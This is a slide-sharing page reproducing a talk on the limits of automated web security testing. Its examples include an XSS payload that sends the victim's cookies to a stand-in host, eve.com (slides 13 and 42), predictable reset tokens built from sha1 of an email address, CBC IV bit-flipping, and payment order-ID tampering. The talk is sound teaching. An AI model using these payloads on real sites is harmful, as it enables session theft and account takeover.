security testing where automation fails today
play

Security Testing - Where Automation Fails Today How does security - PowerPoint PPT Presentation

Nov 15, 2023 •23 likes •583 views

Security Testing - Where Automation Fails Today How does security testing of web applications work What does the tooling landscape look like How does automated security testing fail What can we do Image courtesy of

  1. Security Testing - Where Automation Fails

  2. Today • How does security testing of web applications work • What does the tooling landscape look like • How does automated security testing fail • What can we do Image courtesy of http://theverybesttop10.com/funny-bad-security-fails/

  3. Hi Christiaan Ottow • Developer, Sysop, Hacker • Security Coach @ Computest / Pine Digital Security • cottow@computest.nl • @cottow Image courtesy of https://ospois.wordpress.com/2008/11/13/

  5. Image courtesy of http://matrix.wikia.com/wiki/The_Matrix_Revolutions Image courtesy of http://knowyourmeme.com/memes/ fi rst-day-on-the-internet-kid

  6. Image courtesy of http://www.opensamm.org/

  7. Image courtesy of https://www.microsoft.com/en-us/sdl/process/veri fi cation.aspx

  8. Web application Web application API Ext. Connector Middleware Middleware Mgt system DB SAN

  9. Web application Web application API Ext. Connector Middleware Middleware Mgt system DB SAN

  10. Web application Web application API Ext. Connector Middleware Middleware Mgt system DB SAN

  11. See https://www.certi fi edsecure.com/checklists/

  13. Message to John ATTACKER Hi John, <script>var i = new Image(); img.src = ‘http:// eve.com/'+document.cook FriendFace website ie; </script> how are you? Message from Kevin <html> <body> VICTIM <p>Message from Eve:</p> <p>Hi John, <script>var i = new Image(); img.src = ‘http:// eve.com/'+document.cookie;</script> how are you? </p> </body> </html>

  14. Image courtesy of Acunetix

  15. <?php $name = $_GET[‘name’]; echo “Welcome, $name!” http://test.site/welcome.php?name=<script>

  16. <?php $name = $_GET[‘name’]; echo “Welcome, $name!” http://test.site/welcome.php?name=<script> Welcome, <script>!

  17. <?php $name = htmlspecialchars($_GET[‘name’]); echo “Welcome, $name!” http://test.site/welcome.php?name=<script>

  18. <?php $name = htmlspecialchars($_GET[‘name’]); echo “Welcome, $name!” http://test.site/welcome.php?name=<script> Welcome, &lt;script&gt;!

  19. Image courtesy of http://theverybesttop10.com/funny-bad-security-fails/

  20. Penetration testing cannot prove or even demonstrate that a system is flawless. It can place a reasonable bound on the knowledge and work factor required for a penetrator to succeed. - Smart Guy on the Internet [..] penetration testing cannot prove security of the system, just as no doctor can prove that you are without occult disease; thus, it can just prove that the system is vulnerable. - Other Smart Guy on the Internet

  22. Image courtesy of https://www.microsoft.com/en-us/sdl/process/veri fi cation.aspx

  23. Vulnerability SAST scanner DAST scanner scanner HTTP HTTP, TCP/IP Orchestration <?php include(“header. php”); echo “Hello, world!”; <?php include(“header.php”); Acceptance Production <?php <?php Repository include(“header. include(“header. echo “Hello, world!”; php”); php”); infra infra echo “Hello, echo “Hello, world!”; world!”;

  24. SAST DAST • HP Fortify • Nessus • Checkmarx • Burp Suite • Veracode • Acunetix • Coverity • Qualys WAS • IBM AppScan Source • Netsparker • IBM AppScan

  25. + • Injection testing • SQL, XSS, LDAP, XML, LFI, … • Session handling • CSRF, session regeneration and invalidation, cookie settings, .. • Hardening • Use of SSL and certi fi cate settings, best practices for HTTP headers, extraneous content, … • Infrastructure testing • Open ports, old versions, weak auth methods, known vulns, …

  26. - • Business rules bypass • Unintended state transitions, … • Authorization checking • Predictable tokens / IDs, ID-based authorization, … • Incorrect use of crypto and RNGs • Sign but don’t verify, weak random numbers, AES ECB mode, CBC with public IV, … • System interoperation

  29. € 5,005 ?

  32. https://jira.company.nl/reset/a9bfea171aaf723728939ccd6c67f0e8e59f11de

  33. https://jira.company.nl/reset/a9bfea171aaf723728939ccd6c67f0e8e59f11de sha1(“cottow@company.nl”) = a9bfea171aaf723728939ccd6c67f0e8e59f11de

  34. sha1(“ceo@company.nl”) = 9f26486b094bcc6c1838b42da2eb48f6635f2f84

  35. sha1(“ceo@company.nl”) = 9f26486b094bcc6c1838b42da2eb48f6635f2f84 https://jira.company.nl/reset/9f26486b094bcc6c1838b42da2eb48f6635f2f84

  36. <?php // get params $fname = $_GET['filename']; $iv = $_GET['iv']; // setup crypto $ch = mcrypt_module_open(MCRYPT_RIJNDAEL_256, MCRYPT_MODE_CBC, ''); mcrypt_generic_init($ch, $key, $iv); // open file $fp = fopen(mcrypt_generic($ch, $fname), 'r'); fpassthru($fp);

  38. 10100101 ^ 11101010 = 01001111

  39. decrypted = “/home/john/secret.txt" iv = "\x00\x00\x00\x00\x00\x00\x07\x0e\x1a \x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00" decrypted ^ iv = "/home/mark/secret.txt"

  40. <script>alert(document.cookie);</script>

  42. Blog comment ATTACKER Nice blog! <script>var i = new Image(); img.src = ‘http:// eve.com/'+document.cook ie; Wordpress frontend </script> Database Nice blog! <script>var i = new Image(); img.src = ‘http:// eve.com/'+doc ument.cookie; </script> List of comments <html> Nice blog! <script>var i = new <body> Image(); VICTIM img.src = ‘http:// <p>Comments:</p> eve.com/'+doc ument.cookie; </script> <p>Hi John, <script>var i = new Image(); img.src = ‘http:// eve.com/'+document.cookie;</script> Wordpress admin site how are you? </p> </body> </html>

  44. Order for € 151,63 www.shop.nl/checkout?orderID=1337 ideal.payment.nl/?m=43278&o=1337&a=15163&OrderID=1337&Lang=NL www.shop.nl/con fi rmed?o=1337&status=ok& sig=0d07b9e87debaec6d8d3c71767122fc2&OrderID=1337&Lang=NL

  45. Order for € 151,63 www.shop.nl/checkout?orderID=1337 ideal.payment.nl/?m=43278&o=1337&a=15163&OrderID=1337&Lang=NL www.shop.nl/con fi rmed?o=1337&status=ok& sig=0d07b9e87debaec6d8d3c71767122fc2&OrderID=1337&Lang=NL

  46. Order for € 151,63 www.shop.nl/checkout?orderID=1337 ideal.payment.nl/?m=43278&o=1337&a=15163&OrderID=1337&Lang=NL www.shop.nl/con fi rmed?o=1337&status=ok& sig=0d07b9e87debaec6d8d3c71767122fc2&OrderID=1337&Lang=NL

  47. Order for € 151,63 www.shop.nl/checkout?orderID=1337 ideal.payment.nl/?m=43278&o=1337&a=15163&OrderID=1337&Lang=NL www.shop.nl/con fi rmed?o=1337&status=ok& sig=0d07b9e87debaec6d8d3c71767122fc2&OrderID=1337&Lang=NL

  48. Order for € 151,63 www.shop.nl/checkout?orderID=1337 ideal.payment.nl/?m=43278&o=1337&a=15163&OrderID=1337&Lang=NL www.shop.nl/con fi rmed?o=1337&status=ok& sig=0d07b9e87debaec6d8d3c71767122fc2&OrderID=1336&Lang=NL

  50. Image courtesy of http://9gag.com/gag/3699936/son-i-am-derp

  53. Vulnerability SAST scanner DAST scanner scanner HTTP HTTP, TCP/IP Orchestration <?php include(“header. php”); echo “Hello, world!”; <?php include(“header.php”); Acceptance Production <?php <?php Repository include(“header. include(“header. echo “Hello, world!”; php”); php”); infra infra echo “Hello, echo “Hello, world!”; world!”;

  54. Image courtesy of http://www.qahipster.com/blog/what-is-unit-testing-part-1-of-2

  55. Summary • Security testing is a distinct expertise • Tools can only do part of the testing • Make sure you have the right expertise in your team or enlist help • Make use of the overlap between security- and functional testing Image courtesy of https://memegenerator.net/That-Would-Be-Great

  56. Image courtesy of http://www.slideshare.net/linaroorg/sfo15tr6-server-ecosystem-day-part-6a

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

SECURITY TESTING Towards a safer web world AGENDA 1. 3 WS OF SECURITY TESTING 2. SECURITY

SECURITY TESTING Towards a safer web world AGENDA 1. 3 WS OF SECURITY TESTING 2. SECURITY

SECURITY TESTING Towards a safer web world AGENDA 1. 3 WS OF SECURITY TESTING 2. SECURITY TESTING CONCEPTS 3. SECURITY TESTING TYPES 4. TOP 10 SECURITY RISKS Few Security Breaches Date: 2013-14 September 2016, while in negotiations to

404 views • 18 slides
Automate Security Testing and System Compliance Agenda Introduction to SCAP Introduction

Automate Security Testing and System Compliance Agenda Introduction to SCAP Introduction

Automate Security Testing and System Compliance Agenda Introduction to SCAP Introduction to STIG SUSE STIG Automation Demo Time Whats next? What is SCAP? The Security Content Automation Protocol is a multi-purpose

684 views • 37 slides
WiF iFi security UW Madison CS 642 1 Announcements HW 3 (network security) out today

WiF iFi security UW Madison CS 642 1 Announcements HW 3 (network security) out today

WiF iFi security UW Madison CS 642 1 Announcements HW 3 (network security) out today Due April 2 nd Online classes going forward Testing out BBCollaborate Ultra today Recordings should be available Might use different

1.19k views • 27 slides
6 Years of Test Automation @mikeb2701 Assumptions Testing is important Automating

6 Years of Test Automation @mikeb2701 Assumptions Testing is important Automating

6 Years of Test Automation @mikeb2701 Assumptions Testing is important Automating testing is important Types of tests Static Analysis Unit Testing Integration Testing Acceptance Testing Performance Testing

619 views • 33 slides
I nsert the title of your GATEw ay project and UK-funded activities on autom ated vehicles

I nsert the title of your GATEw ay project and UK-funded activities on autom ated vehicles

TRL Self-driving car, 1960s Testing partial automation, TRL, 2000s Testing in GATEway, Greenwich, 2015 TRL Self-driving car and bus, 1970 Future testing, Greenwich, 2017+? Testing automation in DigiCar, TRL, 2010s I nsert the title of your

312 views • 30 slides
Security Testing Checking for what shouldnt happen Azqa Nadeem PhD Student @ Cyber Security

Security Testing Checking for what shouldnt happen Azqa Nadeem PhD Student @ Cyber Security

Security Testing Checking for what shouldnt happen Azqa Nadeem PhD Student @ Cyber Security Group The Cyber Security lecture series 1 Agenda for today Part I Latest security news Security vulnerabilities in Java

2.02k views • 185 slides
Cyber Security in Mining Automation Ragnar Schierholz, Head of Cyber Security, Industrial

Cyber Security in Mining Automation Ragnar Schierholz, Head of Cyber Security, Industrial

ABB MINING USER CONFERENCE, MAY 02-05, 2017 Cyber Security in Mining Automation Ragnar Schierholz, Head of Cyber Security, Industrial Automation Division Agenda Why worry about cyber security? ABBs approach to cyber security Cyber security

1.07k views • 39 slides
1 Automation Overview Definition Automation (automation, Automation ) : 1) set of all measures

1 Automation Overview Definition Automation (automation, Automation ) : 1) set of all measures

Industrial Automation Spring 2019, EPFL 1 Automation Overview Definition Automation (automation, Automation ) : 1) set of all measures aiming at replacing human work through machines (e.g. automation is applied science) 2) the

1.39k views • 63 slides
Dynamic Security Testing Sicco Verwer s.e.verwer@tudelft.nl 1 Challenge the future Today

Dynamic Security Testing Sicco Verwer s.e.verwer@tudelft.nl 1 Challenge the future Today

Dynamic Security Testing Sicco Verwer s.e.verwer@tudelft.nl 1 Challenge the future Today The world of software security How is it possible? Integer overflows Buffer overflows Heartbleed Stagefright How can it be

1.58k views • 129 slides
Security Automation and Optimization using HP-NA Florian Ecard SNE master student Supervisor:

Security Automation and Optimization using HP-NA Florian Ecard SNE master student Supervisor:

Security Automation and Optimization using HP-NA Florian Ecard SNE master student Supervisor: Olivier Willm 4 th February 2015 Security Automation and Optimization using HP-NA - What is HP Network Automation? - What were the objectives with

483 views • 13 slides
Combinatorial Security Testing: Combinatorial Testing Meets Information Security Dimitris E.

Combinatorial Security Testing: Combinatorial Testing Meets Information Security Dimitris E.

Combinatorial Security Testing: Combinatorial Testing Meets Information Security Dimitris E. Simos SBA Research Applied &amp; Computational Mathematics Division Seminar Series National Institute of Standards and Technology (NIST) Gaithersburg,

675 views • 50 slides
Evolution of Test Automation State Driven Testing Jan De Coster November, 2011 Why test

Evolution of Test Automation State Driven Testing Jan De Coster November, 2011 Why test

Evolution of Test Automation State Driven Testing Jan De Coster November, 2011 Why test automation? Use computers to replace expensive manual testing Cant do it all manually Coverage of functionality Coverage of platforms

613 views • 20 slides
Been testing software for over 10 years Started out as a Manual Tester Moved to Automation

Been testing software for over 10 years Started out as a Manual Tester Moved to Automation

Been testing software for over 10 years Started out as a Manual Tester Moved to Automation testing Now leading teams, defining quality in organizations. Started as a reflection of how much software testing has changed over the last decade 1

779 views • 40 slides
Security Testing TDDC90 Software Security Ulf Kargn Department of Computer and Information

Security Testing TDDC90 Software Security Ulf Kargn Department of Computer and Information

Security Testing TDDC90 Software Security Ulf Kargn Department of Computer and Information Science (IDA) Division for Database and Information Techniques (ADIT) Security testing vs regular testing Regular testing aims to

1.06k views • 54 slides
Testing Today we are going to talk about testing. Before you all lapse into comas in

Testing Today we are going to talk about testing. Before you all lapse into comas in

Testing Today we are going to talk about testing. Before you all lapse into comas in anticipation of how exciting this lecture will be, let me say that testing actually is kind of interesting. I cant say that Im an expert, but it seems

541 views • 19 slides
AI and Machine Learning for Testers Jason Arbon, CEO @Appdiff Relevant Context Testing Neural

AI and Machine Learning for Testers Jason Arbon, CEO @Appdiff Relevant Context Testing Neural

AI and Machine Learning for Testers Jason Arbon, CEO @Appdiff Relevant Context Testing Neural Net Ranker Personalized Web Search and Chrome Test Automation AI for Mobile Test Automation Ai for Test 2 Automation Agenda AI For Testing

645 views • 36 slides
WhatsApp End-to-End Encryption: Are Our Messages Private? Supervisors: Research project by:

WhatsApp End-to-End Encryption: Are Our Messages Private? Supervisors: Research project by:

WhatsApp End-to-End Encryption: Are Our Messages Private? Supervisors: Research project by: Pavlos Lontorfos Ruben De Vries Soufiane el Aissaoui Tom Carpaij 1 Introduction 2 Introduction 1.5 billion users Black box

979 views • 40 slides
Acknowledgements Ed Lider (USFS Retired) Meeting Water Quality EPA: Don Martin, Leigh

Acknowledgements Ed Lider (USFS Retired) Meeting Water Quality EPA: Don Martin, Leigh

11/16/2011 Acknowledgements Ed Lider (USFS Retired) Meeting Water Quality EPA: Don Martin, Leigh Woodruff, Eric Monschein Goals in North Fork CDA DEQ: Tom Herron, Bob Steed, Tyson Clyne, Kristin Subbasin Streams? Keith, Marti Bridges,

63 views • 4 slides
Staying on Your Feet: Taking Steps to Prevent Falls and Fall-Related Injuries Speakers Notes

Staying on Your Feet: Taking Steps to Prevent Falls and Fall-Related Injuries Speakers Notes

1 Staying on Your Feet: Taking Steps to Prevent Falls and Fall-Related Injuries Speakers Notes ------------------------------------------------------------------------------------------------------------------------------------------ Staying on

310 views • 17 slides
Hand Hygiene: Train the Trainer National Hand Hygiene Training Programme for Healthcare Workers

Hand Hygiene: Train the Trainer National Hand Hygiene Training Programme for Healthcare Workers

Hand Hygiene: Train the Trainer National Hand Hygiene Training Programme for Healthcare Workers in Community and Primary Care HCAI AMR Clinical Programme 2017 Who can become a trainer? The trainer will be considered to be more effective it

804 views • 76 slides
The Intersection of Application and Security Architecture Through the lens of distributed

The Intersection of Application and Security Architecture Through the lens of distributed

The Intersection of Application and Security Architecture Through the lens of distributed systems Walt Williams Who is this bloke? Author of Security for Service Oriented Architecture, CRC press 2014 Director of Information Security,

1.12k views • 55 slides
Who am I? Penetration Tester @ The Royal Bank of Scotland BeEF developer: Tunneling Proxy,

Who am I? Penetration Tester @ The Royal Bank of Scotland BeEF developer: Tunneling Proxy,

Ground BeEF : Cutting, devouring and digesting the legs off a browser Michele antisnatchor Orru 6 September 2011 Who am I? Penetration Tester @ The Royal Bank of Scotland BeEF developer: Tunneling Proxy, XssRays integration,

497 views • 32 slides
Fourth Q Quarter and Fiscal Year 2 2019 E Earnings March 5, 2020 Cautionary Notes This

Fourth Q Quarter and Fiscal Year 2 2019 E Earnings March 5, 2020 Cautionary Notes This

Fourth Q Quarter and Fiscal Year 2 2019 E Earnings March 5, 2020 Cautionary Notes This presentation contains forward-looking statements within the meaning of the Private Securities Litigation Reform Act of 1995. All statements other than

312 views • 27 slides
Brewing Kombucha What is Kombucha (pronounced kom-BOO- cha)? In basic terms,

Brewing Kombucha What is Kombucha (pronounced kom-BOO- cha)? In basic terms,

Brewing Kombucha What is Kombucha (pronounced kom-BOO- cha)? In basic terms, Kombucha is fermented sweet tea. Often called mushroom tea, it is a fermented beverage made from black or green tea, sugar and a fungus

370 views • 17 slides

More recommend